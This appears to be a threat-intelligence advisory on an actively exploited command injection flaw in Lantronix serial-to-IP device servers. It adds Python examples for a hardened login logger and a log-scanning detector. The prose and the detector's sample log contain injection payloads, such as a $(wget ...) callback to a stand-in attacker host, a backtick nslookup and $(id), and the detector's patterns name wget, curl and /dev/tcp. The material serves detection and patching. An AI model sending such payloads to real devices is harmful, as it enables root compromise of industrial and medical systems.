CVE-2025-67038: Critical Code Injection in Lantronix EDS5000 Series Under Active Exploitation — Threadlinqs Intelligence
Threat ID: TL-2026-1019 · Severity: CRITICAL · CVSS: 9.8 · Status: ACTIVE · Category: VULNERABILITY
Attribution: Chaya_006 · UNKNOWN
CISA warns of active exploitation of CVE-2025-67038 (CVSS 9.8), an unauthenticated OS command injection flaw in Lantronix EDS5000/EDS3000 serial-to-IP device servers. The LuCI HTTP JSON-RPC
CVE-2025-67038 is a critical (CVSS 3.1: 9.8) unauthenticated OS command injection vulnerability affecting the Lantronix EDS5000 series (EDS5008, EDS5016, EDS5032) and EDS3000 series (EDS3000PS) serial-to-IP device servers, which are widely deployed to bridge legacy serial equipment (SCADA/ICS controllers, medical devices, building automation systems) to IP networks. The vulnerability resides in the LuCI-derived HTTP JSON-RPC authentication module: when a login attempt to /cgi-bin/luci/rpc/auth fails, the device writes a log entry by concatenating the supplied username directly into a shell command string that is then passed to os.execute() without any input sanitization or escaping. By supplying a username containing shell metacharacters and command substitution syntax (e.g. $(...) or backticks), an unauthenticated remote attacker can execute arbitrary operating system commands with root privileges on the device.
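The vulnerable pattern described above, as an added illustration that is not code from this page, from Lantronix or from LuCI: a Python analog (the device's module is Lua and calls os.execute; here the same effect is produced by handing a concatenated string to a POSIX shell through subprocess) of building a log command from an untrusted username, beside a hardened form that checks the name against an allow-list and never passes it through a shell at all. The sample username, the allow-list regex and the use of echo in place of the device's logging command are assumptions of this example; the substituted command is a harmless echo so the two code paths can be compared safely.

```python
import re
import subprocess

# Constructed sample input: a username carrying POSIX command substitution,
# the injection syntax the advisory describes. The embedded command is a
# harmless echo chosen for this example.
SAMPLE_USERNAME = "admin$(echo INJECTED)"

# Allow-list for usernames (hypothetical policy chosen for this example):
# letters, digits and a few punctuation characters, 1 to 64 long.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def vulnerable_log_line(username: str) -> str:
    """Python analog of the flawed pattern: untrusted input is concatenated
    into a command string that a shell then evaluates (os.execute in the Lua
    original). The shell expands $(...) before running the command, so the
    'username' becomes code. 'echo' stands in for the device's log command."""
    cmd = "echo failed login for user " + username
    out = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
    return out.stdout.strip()


def is_valid_username(username: str) -> bool:
    """Allow-list check: anything containing shell metacharacters fails."""
    return USERNAME_RE.fullmatch(username) is not None


def hardened_log_line(username: str) -> str:
    """Hardened form: (1) validate against the allow-list, (2) never invoke a
    shell, passing the value as its own argv element so metacharacters are
    inert data. Returns the text that was actually logged."""
    if not is_valid_username(username):
        username = "<rejected: invalid characters>"
    out = subprocess.run(
        ["echo", "failed login for user " + username],
        capture_output=True,
        text=True,
    )
    return out.stdout.strip()


if __name__ == "__main__":
    print("vulnerable:", vulnerable_log_line(SAMPLE_USERNAME))
    print("hardened:  ", hardened_log_line(SAMPLE_USERNAME))
```

The vulnerable path logs "failed login for user adminINJECTED", proving the substitution ran; the hardened path logs the rejection marker and, for a well-formed name such as "operator", the name itself. Either measure alone (allow-list or argv without a shell) closes the hole; using both gives defence in depth against a validator regression.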
The flaw is one of 22 vulnerabilities disclosed by Forescout Vedere Labs on April 21, 2026 under the umbrella research name BRIDGE:BREAK, which collectively affect Lantronix (8 CVEs across EDS3000PS/EDS5000) and Silex (14 CVEs in the SD330-AC) serial-to-IP converter product lines. BRIDGE:BREAK vulnerability classes span remote code execution (CVE-2026-32955, CVE-2026-32956, CVE-2025-67041), authentication bypass (CVE-2026-32960, CVE-2025-67039), denial-of-service (CVE-2026-32961, CVE-2015-5621), firmware tampering (CVE-2026-32958), arbitrary file upload (CVE-2026-32957), and configuration tampering (CVE-2026-32962, CVE-2026-32964). Forescout demonstrated that chaining these flaws could let an attacker who has already gained a network foothold (e.g. via a compromised industrial router or firewall) pivot through the converter to manipulate sensor readings and actuator behavior in industrial and healthcare OT environments.
Lantronix shipped fixed firmware (2.2.0.0R1 for EDS5000, 3.2.0.0R2 for EDS3000) on February 20, 2026, roughly seven weeks before the CVE was published to NVD on March 11, 2026 and two months before the BRIDGE:BREAK report. Despite the early patch, Forescout observed a threat cluster it tracks as Chaya_006 exploiting CVE-2025-67038 against its honeypots beginning April 5, 2026 — after the patch shipped, suggesting the attackers reverse-engineered the fix (a classic patch-diffing scenario) to construct a working exploit. Chaya_006 traffic used lntxe-prefixed marker strings ($(wget http://<C2>/lntxe1) through lntxea) to fingerprint successful command execution across multiple retrieval methods (wget, busybox wget, curl, Python urllib, raw /dev/tcp sockets, and DNS-based nslookup callbacks to a nip.io wildcard domain), indicating methodical capability testing rather than opportunistic scanning. A second wave on April 6 targeted a related luci_username parameter on other /cgi-bin/luci/ endpoints with both id-command and outbound-callback payloads. In parallel, Forescout tracked a distinct brute-force campaign (Jan 28 - Jun 6, 2026) totaling over 4,100 login attempts across three waves, using four usernames and 200+ password combinations against OpenWRT-derived LuCI credential endpoints, with 'root' as the primary target username.
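An added detection example, not one of the page's own rules and not Forescout's or Threadlinqs' code: a Python scan over constructed access-log lines that flags login attempts to the LuCI auth endpoints whose username carries the injection syntax and campaign artefacts the advisory lists ($(...) and backtick substitution, lntxe marker strings, nip.io callbacks, wget/curl/nslookup), covering both the JSON-RPC body of /cgi-bin/luci/rpc/auth and the luci_username query parameter on other /cgi-bin/luci/ paths, and counting auth attempts per source for the brute-force pattern. The five-field log format, the documentation-range IP addresses, the payload strings and the per-source threshold are all constructed for the example.

```python
import json
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the advisory: POSIX command substitution in the
# username, the campaign's lntxe marker strings and its callback mechanisms.
SHELL_SUBSTITUTION = re.compile(r"\$\(|`")
CAMPAIGN_MARKERS = re.compile(
    r"lntxe[0-9a]|nip\.io|/dev/tcp/|\b(?:wget|curl|nslookup)\b", re.IGNORECASE
)
AUTH_RPC_PATH = "/cgi-bin/luci/rpc/auth"
LUCI_PREFIX = "/cgi-bin/luci/"
BRUTE_FORCE_THRESHOLD = 3  # auth attempts per source; hypothetical tuning value

# Constructed sample log, one request per line:
# "<timestamp> <client> <method> <path> <body-or-dash>".
# Addresses are documentation ranges; payloads follow the advisory's text.
SAMPLE_LOG = """\
2026-04-05T09:14:02Z 198.51.100.23 POST /cgi-bin/luci/rpc/auth {"method":"login","params":["$(wget http://203.0.113.9/lntxe1)","x"]}
2026-04-05T09:14:09Z 198.51.100.23 POST /cgi-bin/luci/rpc/auth {"method":"login","params":["`nslookup a.203-0-113-9.nip.io`","x"]}
2026-04-06T11:02:45Z 198.51.100.23 GET /cgi-bin/luci/?luci_username=%24%28id%29&luci_password=x -
2026-04-06T11:03:01Z 192.0.2.7 POST /cgi-bin/luci/rpc/auth {"method":"login","params":["root","admin"]}
2026-04-06T11:05:17Z 192.0.2.8 GET /cgi-bin/luci/admin/status/overview -
"""


def parse_line(line: str):
    """Split a log line into its five fields; None for malformed lines."""
    parts = line.split(" ", 4)
    if len(parts) != 5:
        return None
    return dict(zip(("ts", "client", "method", "path", "body"), parts))


def extract_username(path: str, body: str):
    """Username from the luci_username query parameter, or params[0] of a
    JSON-RPC login body to the auth endpoint; None if the request is not a
    login attempt."""
    url = urlsplit(path)
    query = parse_qs(url.query)  # percent-decodes, e.g. %24%28 -> "$("
    if "luci_username" in query:
        return query["luci_username"][0]
    if url.path == AUTH_RPC_PATH and body not in ("", "-"):
        try:
            rpc = json.loads(body)
        except ValueError:
            return None
        if isinstance(rpc, dict) and rpc.get("method") == "login":
            params = rpc.get("params") or []
            if params:
                return str(params[0])
    return None


def classify(line: str):
    """A finding dict for a LuCI login attempt whose username carries
    injection indicators, otherwise None."""
    rec = parse_line(line)
    if rec is None or not urlsplit(rec["path"]).path.startswith(LUCI_PREFIX):
        return None
    username = extract_username(rec["path"], rec["body"])
    if username is None:
        return None
    reasons = []
    if SHELL_SUBSTITUTION.search(username):
        reasons.append("shell-substitution")
    if CAMPAIGN_MARKERS.search(username):
        reasons.append("campaign-marker")
    if not reasons:
        return None
    return {"ts": rec["ts"], "client": rec["client"],
            "path": urlsplit(rec["path"]).path,
            "username": username, "reasons": reasons}


def scan(log_text: str):
    """Return (injection findings, sources at or above the brute-force
    threshold of login attempts)."""
    hits, attempts = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line) if line.strip() else None
        if rec is None:
            continue
        if extract_username(rec["path"], rec["body"]) is not None:
            attempts[rec["client"]] += 1
        hit = classify(line)
        if hit:
            hits.append(hit)
    noisy = sorted(c for c, n in attempts.items() if n >= BRUTE_FORCE_THRESHOLD)
    return hits, noisy


if __name__ == "__main__":
    findings, sources = scan(SAMPLE_LOG)
    for f in findings:
        print(f["ts"], f["client"], f["path"], f["reasons"], repr(f["username"]))
    print("brute-force candidates:", sources)
```

On the sample log the first three lines are flagged (the two JSON-RPC bodies on both indicators, the GET with the percent-encoded $(id) on shell substitution alone), the plain root/admin attempt and the status page are not, and 198.51.100.23 crosses the attempt threshold. The two checks are deliberately separate: the substitution regex catches the CWE-78 primitive regardless of payload, while the campaign-marker regex ties a hit to the Chaya_006 tradecraft on the page and will need updating as that changes.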
CISA added CVE-2025-67038 to its Known Exploited Vulnerabilities (KEV) catalog on June 23, 2026, mandating FCEB agency remediation by June 26, 2026 under Binding Operational Directive 26-04. Shodan telemetry cited in coverage identifies roughly 31,850-32,000 internet-exposed OpenWRT LuCI-based devices, of which ~5,000 are believed to be honeypots and ~27,000 are believed to be genuine production systems, underscoring a substantial internet-facing attack surface for an OT-adjacent RCE bug.
Weaknesses (CWE)
CWE-78 (Improper Neutralization of Special Elements used in an OS Command, "OS Command Injection"), CWE-88 (Improper Neutralization of Argument Delimiters in a Command, "Argument Injection")
Target sectors: industrial control systems, health, manufacturing, critical infrastructure, government administration, utilities, operational technology
Target regions: Global, North America, Asia-Pacific
Detections & IOCs
This threat has 9 detection rules across Splunk SPL, Microsoft KQL and Sigma, and 35 indicators of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier).
Tags: VULNERABILITY, CRITICAL, threat intelligence, cybersecurity, CVE-2025-67038, T1592, T1590, T1595, T1190, T1133, T1078, T1059, T1203, T1068